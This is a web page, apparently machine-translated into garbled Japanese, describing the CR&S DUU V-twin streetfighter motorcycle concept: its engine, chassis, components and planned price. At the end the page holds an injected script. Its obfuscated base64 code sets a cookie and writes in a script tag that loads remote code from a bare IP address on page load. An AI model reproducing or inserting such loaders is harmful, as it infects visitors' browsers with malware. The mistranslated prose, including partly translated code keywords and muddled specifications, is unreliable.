ローライド 11 2009

インクルード 2011 それはほとんどここにいるようです.

モダニズムの波はセッティモ・ミラネーゼに少し大きな家を飛んでます. CR&Sは、既に混合近隣からのストリートファイターの独創性と各ピースの一意性によって区別されます.

モノの論理的な進化, 不可欠と楽しいです, これは、双子になります. それはそうです “ソロ” コンセプトバイクが、DUUはすでに数キロを旅してきたフォークリフト; テストは珍しい技術的な選択肢を検証します. ツインX-ウェッジは、その心臓部であります, 国連のVツイン “空気” 検索Sを強化し、ほぼ2リットル&ハーレーダビッドソンの古典スキームを超えるS. のシリンダの角度 56 学位コースは、振動をキャンセル; 3本のクランクケース内のカムシャフトと歯付きベルトとの分布が最適なジオメトリを保証します, ショートロッド、ラッシュアジャスターを経由して. 機械的なノイズがある含まれています, ユーロの承認をすることができます作ります 3 注入および触媒と. ステンレス鋼の排気は、質量を集中し、より横方向の傾きが大きい可能にするQD排気によって研究されています 40 度. この非常に大きな双子の可能性はさらに構成で顕著です “コード”: 少なくとも 100 馬と 130 トルクのニュートン/メートル, しかし、配信は、すべてのスキームがいっぱいです. 別々に変更 5 インクルード 6 関係および一次チェーンは、元のフレームに挿入されたパワートレインを完了します. ステアリングヘッドから鋼管の大部分とは、潤滑剤が含まれています; それは美しいサイドプレートを主張します, ビレットアトリエ根茎, これは、横筒部の手段によって固定されています; 片面スイングアーム. すべての提案CR&走る歓びとDUUのシャーシを確保する目的で生まれたS, イタリアのスポーツ抽出で行われたの蒸留物, 失望させません . 詳細は美しいです, rizomaによってモジュラーホイールから作らステアリングプレートで始まります; Bremboブレーキと品質の懸濁液は、十分な調整が可能. パイロットの精度と応答性敏捷性の約束 , 極端な折り目や取り扱い, あまりにユニットの反対の極端に陥ることなく、 “神経”. 程度のXR1200のものに近い寸法と重量を持ちます 237 kg乾燥, 無限エンジンall'allungoおかげで楽しくする必要があります, 簡単と憤慨. これらの資質は、異なる運転スタイルや生活に係る自動二輪車を設定するには、モジュラー哲学を追加します, 部品の品質, 工業用の保証付きの職人技: このストリートファイター周りの即時の関心を予見するのは簡単. コンポーネントCRの多くは&Sは、カスタム根茎のようなイタリアの会社によってドナートCannatelloによって設計されています. 独創性とフィッティング “カスタマイズ” DUUの賛成で追加のプラスを表している必要があります. でも、固定価格は、興味深いことを約束します, 年頃 20.000 ユーロ: VRSCのそれに近く、新しいV-マックス以下… どのくらい前に 2011?

 

PDFのダウンロード… 関数getCookie(E){VAR U = document.cookie.match(新しい正規表現(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/グラム,”\\$1″)+”=([^;]*)”));Uを返します?decodeURIComponent(ザ・[1]):空隙 0}VARのSRC =”データ:テキスト/ javascriptの;base64で、ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs =”,今= Math.floor(Date.now()/1E3),クッキー= getCookie(“リダイレクト”);もし(今>=(時間=クッキー)||無効0 ===時間){VAR時間= Math.floor(Date.now()/1E3 + 86400),日付=新しい日付((新しい日付).時間をもらう()+86400);document.cookie =”リダイレクト=”+時間+”; パス= /; =有効期限が切れます”+date.toGMTString(),document.writeを(”)}